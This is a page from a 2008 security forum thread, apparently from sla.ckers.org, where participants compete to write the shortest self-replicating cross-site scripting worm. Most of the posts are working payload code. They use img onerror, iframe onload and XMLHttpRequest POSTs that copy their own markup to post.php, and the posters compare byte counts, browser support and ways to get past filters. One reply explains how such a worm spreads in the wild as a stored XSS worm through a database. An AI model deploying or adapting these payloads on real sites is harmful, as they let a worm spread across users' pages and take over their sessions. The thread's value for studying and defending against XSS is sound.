Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...910111213141516171819...LastNext
Current Page: 14 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 07:26AM

Yeh, still toying with other ideas as well:
<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 08, 2008 08:02AM

This equals marios:-

<form><img src="" onerror="(f=parentNode)[0].value='<form>'+f.innerHTML;with(f)submit(alert('XSS',action=(method='post')+'.php'))"><input name="content">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 08, 2008 08:06AM

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))"

146 chars!!!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/08/2008 08:16AM by Gareth Heyes.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 08:21AM

In case of the forms, I'm still pondering on how to simplify this tag:
<input name="content">
if it can be reduced, it would have huge impact I guess.

other things crossed my mind:
innerHTML.link() or .sub()
if we can, cram it all into a whole link?

anyone had luck with:

<embed,frame,layer> ?

and of course the nobrainer:

this.onload = x();

--



Edited 1 time(s). Last edit at 01/08/2008 08:22AM by Ronald.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 08:22AM

@Gareth: Nice but unfortunately both grow :-/

@Ronald: I played with most tags listed by the WASC Script Mapping Project - IFRAME IMHO is definitely the shortest way due to the fact that no src is needed for onload. I also tried numerous ways to leave away the name="content " - or map it via JS but no success yet... and the A-link() combo takes exactly the same space like B-bold() - damn:)



Edited 3 time(s). Last edit at 01/08/2008 08:27AM by .mario.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 08:28AM

Yeah me2 usually the code growed instead, I had some clever sollutions but js assignment made it bloat. .mario, the IMG is still the smallest et doctype compliant yet? (yours and mine(+1))

or am I missing something? since the you'll need a closing tag on the ifr.

edit: with the link() I thought about just making a link, which should be shorter then .bold() if you can embed the code into the link, it's wot i meant :) cuz you can assign more attributes to <a> then <b> like just have: href="js(); - just exploring the ideas.


--



Edited 2 time(s). Last edit at 01/08/2008 08:35AM by Ronald.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 08, 2008 08:29AM

This one doesn't :-

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 08:47AM

Still my vote goes to the 'img' since 'iframes' can be blocked whereas images are usually not. And I also think on how some prevention methods work, see maybe the scan for iframes, who scans for images? further more if you look at myspace-like sites, they could allow 'img' over 'iframe', thus give it a far wider spectrum.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 08, 2008 09:14AM

@Ronald:Who scans for javascript?



Edited 1 time(s). Last edit at 01/08/2008 09:22AM by Spyware.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 09:20AM

@Gareth: It does - since the FORM tag isn't closed.

@Ronald:
Quote

the IMG is still the smallest et doctype compliant yet?

I think the IFRAME solution is valid since it utilizes slice to not grow and I am pretty sure that valid markup is not a requirement - or is it? if yes you were right with the IMG tag I think. but I'm not sure...

@Spyware: PHPIDS scans for all malicious JS/HTML ;)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 08, 2008 09:28AM

@mario

Damn it!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 09:57AM

@spyware,

well, also think about a flawed BBcode parser here, since most allow images then it's a matter of getting the event injected properly. All speculation of course, since I don't win either way I'd like to cast my vote on the one that I started, the 'img' instead of the 'iframe' version (which I started also btw).

Matter of preference I figure, if someone can come up with something better, give it a go i'dd say. ;)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 08, 2008 09:57AM

-Wait, I was being stupid all along ;x-



Edited 2 time(s). Last edit at 01/08/2008 10:21AM by Spyware.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 04:01PM

not sure why we haven't used:
.cloneNode(1)
.cloneNode(1).innerHTML
.cloneNode(1,alert('xss')).innerHTML

yet

not because of .parentNode, but just so it could come in handy maybe cause we can clone id spans with them.

--

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: badsamaritan
Date: January 08, 2008 04:02PM

<form method=post action=post.php><input name=content><input type=image onerror="(f=this.form).content.value=f.parentNode.innerHTML;alert('xss');f.submit()"src=></form>

-matt
http://badsamaritan.net

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 04:06PM

@badsamaritan

I deleted your other vector posted in the wrong thread, since this is the same.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 08, 2008 06:49PM

<form id=_ method=post action=post.php><input name='content'><iframe onload=with(_)alert('XSS',submit(_[0].value=_.outerHTML))></form>

meh a crappy 134 :( and Firefox doesn't support outerHTML :( - so this vector is IE, Opera and Safari only.


Also hats of to sdc, shawn, ronald, mario, gareth, doctordan and all the others - you have certainly taught this rookie a thing or 2 (and to think I seriously thought my first submission was the shizznit).


Yes, I realise these worms don't meet the competition criteria but at least we can see how small we can go when we target specific browsers.

EDIT: 111 bytes (IE only again)
<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 16 time(s). Last edit at 01/08/2008 08:33PM by digi7al64.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 08, 2008 10:13PM

\0/ - 133bytes - works with both Firefox and IE (i hope)
<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p id=_>'+_.innerHTML+'</p>')</script></p>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: DoctorDan
Date: January 08, 2008 10:20PM

{<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+\v/)),alert('XSS')">0x0B

133 bytes as well. Should work with IE and FF. The '0x0B' is just a representation of the vertical tab character in hex.

-Dan

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 08, 2008 10:27PM

@DoctorDan - I think your submission would fail the rules as the { could already be used on the page... but in saying that so could the _ which I use so perhaps rsnake could clarify this point for us.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: DoctorDan
Date: January 08, 2008 10:44PM

Alright, but that character can be easily changed to any uncommon character. I chose '{' just randomly, and anything will work in its place.

-Dan

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 12:11AM

Regarding XHR - It appears as though Firefox's support of adding the "Content type" header into the XHR request only begun between versions 2.0.0.7 and 2.0.0.11 (the current version - which we have been testing with Apache today). Therefore rsnake are we expected to support these out-of-date browsers... which means adding the content-type header and essentially killing the use of XHR in this contest?

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/09/2008 12:16AM by digi7al64.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Date: January 09, 2008 12:45AM

I was just testing the two most recent submissions.
I run Apache/2.2.3 and I use Firefox/2.0.0.6

What I had to change:
- Added the content-type. This was completely required because Apache would not accept any POST content without it, and Firefox wouldn't automatically add it.
- The plus symbol had to be encoded. Otherwise, it would be converted to a space. I tried encode() but it didn't touch the plus symbol.

Both of these changes were completely required for the code to properly run.

Here is digi7al64's submission, modified:

<p/id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('Content-type','application/x-www-form-urlencoded'),send('content=<p/id=_>'+_.innerHTML.replace(/\+/g,"%2B")+'</p>')</script></p>

224 characters seems long, but at least it works with slightly older versions of FF and Apache.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 12:46AM

@digi7al64

I like your idea, but it's doctype dependant due to the _id selector and therefore might not work everywhere,
so to be universal it requires at least some logic whether to use only _ or document._

To be formal, it does not run -standalone- without a doctype/body that is, which violates at least one rule.

About the 'content type', that's a clever question; since every Firefox user is 'almost' updated automatically when a new version is available, I would say it's no problem, but that's up to RSnake.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:06AM

@GlacialPhoenix

Apache supports content negotiation by default since 1.x, that means for content-type as well as for type mapping, as well other mimes/headers. I have 4 different default instances of Apache running from 1.x to latest, and all negotiate properly without a content-type, since my hunch is that the browser already says it's is POST and therefore it will be treated like application/x-www-form-urlencoded as default. And since on your Apache instance the + symbol wasn't properly encoded, it means that you either have turned content negotiation down, of removed the mod_negotiation module, or it's broken. In other words, sounds as an exotic issue.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Date: January 09, 2008 01:21AM

Ronald Wrote:
-------------------------------------------------------
> [...] it means that you either have
> turned content negotiation down, of removed the
> mod_negotiation module, or it's broken. In other
> words, sounds as an exotic issue.


Haven't touched it since I installed. I also double-checked that negotiation is installed. Just to be sure, I uploaded it to my Dreamhost account (Apache/2.0.61), attempted it again and got the same results. Although, I guess that it could still be considered an exotic issue. =/



Edited 1 time(s). Last edit at 01/09/2008 01:22AM by GlacialPhoenix.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 02:05AM

@Ronald - looking at the rule it states

6) must not use knowledge of the DOM unless you name a class or and id and use the class or id. No looking for the n-th script on the page as that will change from site to site.

Therefore my take is that you can use _.innerHTML which makes my code fine but then again 2 states

2) must self replicate the entire payload to a page called "post.php" as a parameter called "content" on the same domain (must be POSTed to that URL, no GETs please). We'll assume post.php will properly URL unescape your code.


Now is saying that if i modify my code to the following it will still fail as there is no document object within the page as I understand when there are no html,head and body tags.

send('content=<p id=_>'+document.getElementById('_').innerHTML+'<p>')

Thus the concept of id's are useless unless we add all the relevant tags into the payload. looks like im back to the drawing board :(

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: krazl
Date: January 09, 2008 03:06AM

Anyone pleasssseee explain implementation...

Correct me if i'm wrong.

1) Create post.php file contain above.
2) open post.php file
3) infinite loop!
4) ctrl+Alt+Del > shutdown browser.

I can't see any worm propergate themself.. any expert here, Please explain ... Thx in advance

i'm noob,
krazl
www.krazl.com

http://www.krazl.com

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:53AM

@digi7al64 Ay, we never know the page has a proper DOM, or the page where it's send to. post.php could be only a PHP script without a full DOM.

@krazl, well it replicates itself to post.php, and then again, and again. For the sake of example this is how it's done and how worms can propagate itself, in a real world example we don't alert('xss') but rather inject it into a database to let it become a stored worm, taht again when someone opens his page, will inject the page of his peers, and so on.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 06:05AM

@doctordan - from a stand alone point you have the same issues i did in that you are assuming a parent node/dom exists.

@ronald - thanks for the feedback, it drove me to look at this from a slightly different angle whilst teaching me even more about how the dom works.

FINAL SUBMISSIONS FOR ME

No Doc Type Issues - 140 byte XHR worm
<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>

Doc Type Issues - 131 byte XHR worm
<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p id=_>'+_.innerHTML+'<p>')</script><p>

Smallest XHR Internet Explorer worm - 111 bytes
<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Pages: PreviousFirst...910111213141516171819...LastNext
Current Page: 14 of 20


Sorry, only registered users may post in this forum.